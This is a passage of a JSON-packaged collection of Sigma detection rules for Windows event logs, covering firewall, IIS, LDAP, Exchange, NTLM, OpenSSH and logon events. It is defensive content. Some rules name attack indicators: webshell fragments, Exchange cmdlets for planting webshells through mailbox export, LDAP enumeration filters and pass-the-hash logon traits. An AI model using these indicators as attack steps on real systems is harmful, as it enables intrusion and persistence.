'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        ModifyingApplication|endswith: '\\MsMpEng.exe'\n    filter_main_null:\n        ModifyingApplication: null\n    filter_main_empty:\n        ModifyingApplication: ''\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml",
    "content": "title: The Windows Defender Firewall Service Failed To Load Group Policy\nid: 7ec15688-fd24-4177-ba43-1a950537ee39\nstatus: test\ndescription: Detects activity when The Windows Defender Firewall service failed to load Group Policy\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113\ndate: 2022-02-19\nmodified: 2023-01-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID: 2009 # The Windows Defender Firewall service failed to load Group Policy\n    condition: selection\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_reset_config.yml",
    "content": "title: Windows Defender Firewall Has Been Reset To Its Default Configuration\nid: 04b60639-39c0-412a-9fbe-e82499c881a3\nstatus: test\ndescription: Detects activity when Windows Defender Firewall has been reset to its default configuration\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113\ndate: 2022-02-19\nmodified: 2023-04-21\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2032 # Windows Defender Firewall has been reset to its default configuration\n            - 2060 # Windows Defender Firewall has been reset to its default configuration. (Windows 11)\n    condition: selection\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml",
    "content": "title: Windows Firewall Settings Have Been Changed\nid: 00bb5bd5-1379-4fcf-a965-a5b6f7478064\nstatus: test\ndescription: Detects activity when the settings of the Windows firewall have been changed\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-02-19\nmodified: 2023-04-21\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2002 # A Windows Defender Firewall setting has changed.\n            - 2083 # A Windows Defender Firewall setting has changed. (Windows 11)\n            - 2003 # A Windows Firewall setting in the profile has changed\n            - 2082 # A Windows Defender Firewall setting in the %1 profile has changed. (Windows 11)\n            - 2008  # Windows Firewall Group Policy settings have changed. The new settings have been applied\n            # - 2010  # Network profile changed on an interface.\n    condition: selection\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/iis-configuration/win_iis_logging_etw_disabled.yml",
    "content": "title: ETW Logging/Processing Option Disabled On IIS Server\nid: a5b40a90-baf5-4bf7-a6f7-373494881d22\nstatus: test\ndescription: Detects changes to of the IIS server configuration in order to disable/remove the ETW logging/processing option.\nreferences:\n    - https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis\n    - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n    - https://learn.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/logfile/\nauthor: frack113, Nasreddine Bencherchali\ndate: 2024-10-06\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1562.002\n    - attack.t1505.004\nlogsource:\n    product: windows\n    service: iis-configuration\ndetection:\n    selection:\n        EventID: 29\n        Configuration|endswith: '@logTargetW3C'\n        OldValue|contains: 'ETW'\n    filter_main_etw_added:\n        NewValue|contains: 'ETW'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/iis-configuration/win_iis_logging_http_disabled.yml",
    "content": "title: HTTP Logging Disabled On IIS Server\nid: e8ebd53a-30c2-45bd-81bb-74befba07bdb\nstatus: test\ndescription: Detects changes to of the IIS server configuration in order to disable HTTP logging for successful requests.\nreferences:\n    - https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis\n    - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n    - https://learn.microsoft.com/en-us/iis/configuration/system.webserver/httplogging\nauthor: frack113\ndate: 2024-10-06\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1562.002\n    - attack.t1505.004\nlogsource:\n    product: windows\n    service: iis-configuration\ndetection:\n    selection:\n        EventID: 29\n        Configuration: '/system.webServer/httpLogging/@dontLog'\n        NewValue: 'true'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/iis-configuration/win_iis_module_added.yml",
    "content": "title: New Module Module Added To IIS Server\nid: dd857d3e-0c6e-457b-9b48-e82ae7f86bd7\nstatus: test\ndescription: Detects the addition of a new module to an IIS server.\nreferences:\n    - https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis\n    - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n    - https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\n    - https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview\nauthor: frack113\ndate: 2024-10-06\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1562.002\n    - attack.t1505.004\nlogsource:\n    product: windows\n    service: iis-configuration\ndetection:\n    selection:\n        EventID: 29\n        Configuration|contains: '/system.webServer/modules/add'\n    filter_main_builtin:\n        NewValue:\n            - 'AnonymousAuthenticationModule'\n            - 'CustomErrorModule'\n            - 'DefaultDocumentModule'\n            - 'DirectoryListingModule'\n            - 'FileCacheModule'\n            - 'HttpCacheModule'\n            - 'HttpLoggingModule'\n            - 'ProtocolSupportModule'\n            - 'RequestFilteringModule'\n            - 'StaticCompressionModule'\n            - 'StaticFileModule'\n            - 'TokenCacheModule'\n            - 'UriCacheModule'\n    filter_main_remove:\n        NewValue: ''\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/iis-configuration/win_iis_module_removed.yml",
    "content": "title: Previously Installed IIS Module Was Removed\nid: 9e1a1fdf-ee58-40ce-8e15-b66ca5a80e1f\nstatus: test\ndescription: Detects the removal of a previously installed IIS module.\nreferences:\n    - https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis\n    - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n    - https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\n    - https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview\nauthor: Nasreddine Bencherchali\ndate: 2024-10-06\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1562.002\n    - attack.t1505.004\nlogsource:\n    product: windows\n    service: iis-configuration\ndetection:\n    selection:\n        EventID: 29\n        Configuration|contains: '/system.webServer/modules/remove'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activity\n# Note: Upgrade after an initial baseline\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/ldap/win_ldap_recon.yml",
    "content": "title: Potential Active Directory Reconnaissance/Enumeration Via LDAP\nid: 31d68132-4038-47c7-8f8e-635a39a7c174\nstatus: test\ndescription: Detects potential Active Directory enumeration via LDAP\nreferences:\n    - https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726\n    - https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1\n    - https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs\n    - https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c\n    - https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427\n    - https://ipurple.team/2024/07/15/sharphound-detection/\nauthor: Adeem Mawani\ndate: 2021-06-22\nmodified: 2025-07-04\ntags:\n    - attack.discovery\n    - attack.t1069.002\n    - attack.t1087.002\n    - attack.t1482\nlogsource:\n    product: windows\n    service: ldap\n    definition: 'Requirements: Microsoft-Windows-LDAP-Client/Debug ETW logging'\ndetection:\n    generic_search:\n        EventID: 30\n        SearchFilter|contains:\n            - '(groupType:1.2.840.113556.1.4.803:=2147483648)'\n            - '(groupType:1.2.840.113556.1.4.803:=2147483656)'\n            - '(groupType:1.2.840.113556.1.4.803:=2147483652)'\n            - '(groupType:1.2.840.113556.1.4.803:=2147483650)'\n            - '(sAMAccountType=805306369)'\n            - '(sAMAccountType=805306368)'\n            - '(sAMAccountType=536870913)'\n            - '(sAMAccountType=536870912)'\n            - '(sAMAccountType=268435457)'\n            - '(sAMAccountType=268435456)'\n            - '(objectCategory=groupPolicyContainer)'\n            - '(objectCategory=organizationalUnit)'\n            # - '(objectCategory=Computer)' Prone to false positives\n            - '(objectCategory=nTDSDSA)'\n            - '(objectCategory=server)'\n            - '(objectCategory=domain)'\n            - '(objectCategory=person)'\n            - '(objectCategory=group)'\n            - '(objectCategory=user)'\n            - '(objectClass=trustedDomain)'\n            - '(objectClass=computer)'\n            - '(objectClass=server)'\n            - '(objectClass=group)'\n            - '(objectClass=user)'\n            - '(primaryGroupID=521)'\n            - '(primaryGroupID=516)'\n            - '(primaryGroupID=515)'\n            - '(primaryGroupID=512)'\n            - 'Domain Admins'\n            - 'objectGUID=\\*'\n            - '(schemaIDGUID=\\*)'\n            - 'admincount=1'\n    distinguished_name_enumeration:\n        EventID: 30\n        SearchFilter: '(objectclass=\\*)'\n        DistinguishedName|contains:\n            - 'CN=Domain Admins'\n            - 'CN=Enterprise Admins'\n            - 'CN=Group Policy Creator Owners'\n    suspicious_flag:\n        EventID: 30\n        SearchFilter|contains:\n            - '(userAccountControl:1.2.840.113556.1.4.803:=4194304)'\n            - '(userAccountControl:1.2.840.113556.1.4.803:=2097152)'\n            - '!(userAccountControl:1.2.840.113556.1.4.803:=1048574)'\n            - '(userAccountControl:1.2.840.113556.1.4.803:=524288)'\n            - '(userAccountControl:1.2.840.113556.1.4.803:=65536)'\n            - '(userAccountControl:1.2.840.113556.1.4.803:=8192)'\n            - '(userAccountControl:1.2.840.113556.1.4.803:=544)'\n            - '!(UserAccountControl:1.2.840.113556.1.4.803:=2)'\n            - 'msDS-AllowedToActOnBehalfOfOtherIdentity'\n            - 'msDS-AllowedToDelegateTo'\n            - 'msDS-GroupManagedServiceAccount'\n            - '(accountExpires=9223372036854775807)'\n            - '(accountExpires=0)'\n            - '(adminCount=1)'\n            - 'ms-MCS-AdmPwd'\n    narrow_down_filter:\n        EventID: 30\n        SearchFilter|contains:\n            - '(domainSid=*)'\n            - '(objectSid=*)'\n    condition: (generic_search and not narrow_down_filter) or suspicious_flag or distinguished_name_enumeration\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/lsa_server/win_lsa_server_normal_user_admin.yml",
    "content": "title: Standard User In High Privileged Group\nid: 7ac407cc-0f48-4328-aede-de1d2e6fef41\nstatus: test\ndescription: Detect standard users login that are part of high privileged groups such as the Administrator group\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers\n    - https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml\nauthor: frack113\ndate: 2023-01-13\nmodified: 2023-05-05\ntags:\n    - attack.credential-access\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: lsa-server\n    definition: 'Requirements: Microsoft-Windows-LSA/Operational (199FE037-2B82-40A9-82AC-E1D46C792B99) Event Log must be enabled and collected in order to use this rule.'\ndetection:\n    selection:\n        EventID: 300\n        TargetUserSid|startswith: 'S-1-5-21-' # Standard user\n        SidList|contains:\n            - 'S-1-5-32-544'    # Local admin\n            - '-500}'           # Domain admin\n            - '-518}'           # Schema admin\n            - '-519}'           # Enterprise admin\n    filter_main_admin:\n        TargetUserSid|endswith:\n            - '-500'           # Domain admin\n            - '-518'           # Schema admin\n            - '-519'           # Enterprise admin\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Standard domain users who are part of the administrator group.\n      These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml",
    "content": "title: ProxyLogon MSExchange OabVirtualDirectory\nid: 550d3350-bb8a-4ff3-9533-2ba533f4a1c0\nstatus: test\ndescription: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory\nreferences:\n    - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-09\nmodified: 2023-01-23\ntags:\n    - attack.t1587.001\n    - attack.resource-development\nlogsource:\n    product: windows\n    service: msexchange-management\ndetection:\n    keywords_cmdlet:\n        '|all':\n            - 'OabVirtualDirectory'\n            - ' -ExternalUrl '\n    keywords_params:\n        - 'eval(request'\n        - 'http://f/<script'\n        - '\"unsafe\"};'\n        - 'function Page_Load()'\n    condition: keywords_cmdlet and keywords_params\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml",
    "content": "title: Certificate Request Export to Exchange Webserver\nid: b7bc7038-638b-4ffd-880c-292c692209ef\nstatus: test\ndescription: Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell\nreferences:\n    - https://twitter.com/GossiTheDog/status/1429175908905127938\nauthor: Max Altgelt (Nextron Systems)\ndate: 2021-08-23\nmodified: 2023-01-23\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    service: msexchange-management\n    product: windows\ndetection:\n    keywords_export_command:\n        '|all':\n            - 'New-ExchangeCertificate'\n            - ' -GenerateRequest'\n            - ' -BinaryEncoded'\n            - ' -RequestFile'\n    keywords_export_params:\n        - '\\\\\\\\localhost\\\\C$'\n        - '\\\\\\\\127.0.0.1\\\\C$'\n        - 'C:\\\\inetpub'\n        - '.aspx'\n    condition: keywords_export_command and keywords_export_params\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml",
    "content": "title: Mailbox Export to Exchange Webserver\nid: 516376b4-05cd-4122-bae0-ad7641c38d48\nstatus: test\ndescription: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it\nreferences:\n    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\nauthor: Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems)\ndate: 2021-08-09\nmodified: 2023-04-30\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    service: msexchange-management\n    product: windows\ndetection:\n    export_command:\n        '|all':\n            - 'New-MailboxExportRequest'\n            - ' -Mailbox '\n    export_params:\n        - '-FilePath \"\\\\\\\\' # We care about any share location.\n        - '.aspx'\n    role_assignment:\n        '|all':\n            - 'New-ManagementRoleAssignment'\n            - ' -Role \"Mailbox Import Export\"'\n            - ' -User '\n    condition: (export_command and export_params) or role_assignment\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml",
    "content": "title: Remove Exported Mailbox from Exchange Webserver\nid: 09570ae5-889e-43ea-aac0-0e1221fb3d95\nstatus: test\ndescription: Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit\nreferences:\n    - https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-27\nmodified: 2023-01-23\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    service: msexchange-management\n    product: windows\ndetection:\n    keywords:\n        '|all':\n            - 'Remove-MailboxExportRequest'\n            - ' -Identity '\n            - ' -Confirm \"False\"'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml",
    "content": "title: Exchange Set OabVirtualDirectory ExternalUrl Property\nid: 9db37458-4df2-46a5-95ab-307e7f29e675\nstatus: test\ndescription: Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log\nreferences:\n    - https://twitter.com/OTR_Community/status/1371053369071132675\nauthor: Jose Rodriguez @Cyb3rPandaH\ndate: 2021-03-15\nmodified: 2023-01-23\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: windows\n    service: msexchange-management\ndetection:\n    keywords:\n        '|all':\n            - 'Set-OabVirtualDirectory'\n            - 'ExternalUrl'\n            - 'Page_Load'\n            - 'script'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_transportagent.yml",
    "content": "title: MSExchange Transport Agent Installation - Builtin\nid: 4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6\nrelated:\n    - id: 83809e84-4475-4b69-bc3e-4aad8568612f\n      type: derived\nstatus: test\ndescription: Detects the Installation of a Exchange Transport Agent\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7\nauthor: Tobias Michalski (Nextron Systems)\ndate: 2021-06-08\nmodified: 2022-11-27\ntags:\n    - attack.persistence\n    - attack.t1505.002\nlogsource:\n    product: windows\n    service: msexchange-management\ndetection:\n    selection:\n        - 'Install-TransportAgent'\n    condition: selection\nfalsepositives:\n    - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml",
    "content": "title: Failed MSExchange Transport Agent Installation\nid: c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa\nstatus: test\ndescription: Detects a failed installation of a Exchange Transport Agent\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8\nauthor: Tobias Michalski (Nextron Systems)\ndate: 2021-06-08\nmodified: 2022-07-12\ntags:\n    - attack.persistence\n    - attack.t1505.002\nlogsource:\n    service: msexchange-management\n    product: windows\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        EventID: 6\n        Data|contains: 'Install-TransportAgent'\n    condition: selection\nfalsepositives:\n    - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml",
    "content": "title: NTLM Logon\nid: 98c3bcf1-56f2-49dc-9d8d-c66cf190238b\nstatus: test\ndescription: Detects logons using NTLM, which could be caused by a legacy source or attackers\nreferences:\n    - https://twitter.com/JohnLaTwC/status/1004895028995477505\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-06-08\nmodified: 2024-07-22\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1550.002\nlogsource:\n    product: windows\n    service: ntlm\n    definition: Requires events from Microsoft-Windows-NTLM/Operational\ndetection:\n    selection:\n        EventID: 8002\n    condition: selection\nfalsepositives:\n    - Legacy hosts\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml",
    "content": "title: NTLM Brute Force\nid: 9c8acf1a-cbf9-4db6-b63c-74baabe03e59\nstatus: test\ndescription: Detects common NTLM brute force device names\nreferences:\n    - https://www.varonis.com/blog/investigate-ntlm-brute-force\nauthor: Jerry Shockley '@jsh0x'\ndate: 2022-02-02\ntags:\n    - attack.credential-access\n    - attack.t1110\nlogsource:\n    product: windows\n    service: ntlm\n    definition: Requires events from Microsoft-Windows-NTLM/Operational\ndetection:\n    selection:\n        EventID: 8004\n    devicename:\n        WorkstationName:\n            - 'Rdesktop'\n            - 'Remmina'\n            - 'Freerdp'\n            - 'Windows7'\n            - 'Windows8'\n            - 'Windows2012'\n            - 'Windows2016'\n            - 'Windows2019'\n    condition: selection and devicename\nfalsepositives:\n    - Systems with names equal to the spoofed ones used by the brute force tools\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml",
    "content": "title: Potential Remote Desktop Connection to Non-Domain Host\nid: ce5678bb-b9aa-4fb5-be4b-e57f686256ad\nstatus: test\ndescription: Detects logons using NTLM to hosts that are potentially not part of the domain.\nreferences:\n    - n/a\nauthor: James Pemberton\ndate: 2020-05-22\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    service: ntlm\n    definition: Requires events from Microsoft-Windows-NTLM/Operational\ndetection:\n    selection:\n        EventID: 8001\n        TargetName|startswith: 'TERMSRV'\n    condition: selection\nfalsepositives:\n    - Host connections to valid domains, exclude these.\n    - Host connections not using host FQDN.\n    - Host connections to external legitimate domains.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml",
    "content": "title: OpenSSH Server Listening On Socket\nid: 3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781\nstatus: test\ndescription: Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.\nreferences:\n    - https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH\n    - https://winaero.com/enable-openssh-server-windows-10/\n    - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse\n    - https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: mdecrevoisier\ndate: 2022-10-25\ntags:\n    - attack.lateral-movement\n    - attack.t1021.004\nlogsource:\n    product: windows\n    service: openssh\ndetection:\n    selection:\n        EventID: 4\n        process: sshd\n        payload|startswith: 'Server listening on '\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_access_token_abuse.yml",
    "content": "title: Potential Access Token Abuse\nid: 02f7c9c1-1ae8-4c6a-8add-04693807f92f\nstatus: test\ndescription: Detects potential token impersonation and theft. Example, when using \"DuplicateToken(Ex)\" and \"ImpersonateLoggedOnUser\" with the \"LOGON32_LOGON_NEW_CREDENTIALS flag\".\nreferences:\n    - https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation\n    - https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html\nauthor: Michaela Adams, Zach Mathis\ndate: 2022-11-06\nmodified: 2023-04-26\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134.001\n    - stp.4u\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 9\n        LogonProcessName: 'Advapi'\n        AuthenticationPackageName: 'Negotiate'\n        ImpersonationLevel: '%%1833' # Impersonation\n    condition: selection\nfalsepositives:\n    - Anti-Virus\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_admin_rdp_login.yml",
    "content": "title: Admin User Remote Logon\nid: 0f63e1ef-1eb9-4226-9d54-8927ca08520a\nstatus: test\ndescription: Detect remote login by Administrator user (depending on internal pattern).\nreferences:\n    - https://car.mitre.org/wiki/CAR-2016-04-005\nauthor: juju4\ndate: 2017-10-29\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.initial-access\n    - attack.t1078.001\n    - attack.t1078.002\n    - attack.t1078.003\n    - car.2016-04-005\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Identifiable administrators usernames (pattern or special unique character. ex: \"Admin-*\"), internal policy mandating use only as secondary account'\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 10\n        AuthenticationPackageName: Negotiate\n        TargetUserName|startswith: 'Admin'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity.\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_diagtrack_eop_default_login_username.yml",
    "content": "title: DiagTrackEoP Default Login Username\nid: 2111118f-7e46-4fc8-974a-59fd8ec95196\nstatus: test\ndescription: Detects the default \"UserName\" used by the DiagTrackEoP POC\nreferences:\n    - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-03\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 9\n        TargetOutboundUserName: 'thisisnotvaliduser'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml",
    "content": "title: A Member Was Added to a Security-Enabled Global Group\nid: c43c26be-2e87-46c7-8661-284588c5a53e\nrelated:\n    - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e\n      type: obsolete\nstatus: stable\ndescription: Detects activity when a member is added to a security-enabled global group\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2023-04-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4728 # A member was added to a security-enabled global group\n            - 632 # Security Enabled Global Group Member Added\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml",
    "content": "title: A Member Was Removed From a Security-Enabled Global Group\nid: 02c39d30-02b5-45d2-b435-8aebfe5a8629\nrelated:\n    - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e\n      type: obsolete\nstatus: stable\ndescription: Detects activity when a member is removed from a security-enabled global group\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2023-04-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 633 # Security Enabled Global Group Member Removed\n            - 4729 # A member was removed from a security-enabled global group\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_overpass_the_hash.yml",
    "content": "title: Successful Overpass the Hash Attempt\nid: 192a0330-c20b-4356-90b6-7b7049ae0b87\nstatus: test\ndescription: Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.\nreferences:\n    - https://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html\nauthor: Roberto Rodriguez (source), Dominik Schaudel (rule)\ndate: 2018-02-12\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.s0002\n    - attack.t1550.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 9\n        LogonProcessName: seclogo\n        AuthenticationPackageName: Negotiate\n    condition: selection\nfalsepositives:\n    - Runas command-line tool using /netonly parameter\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml",
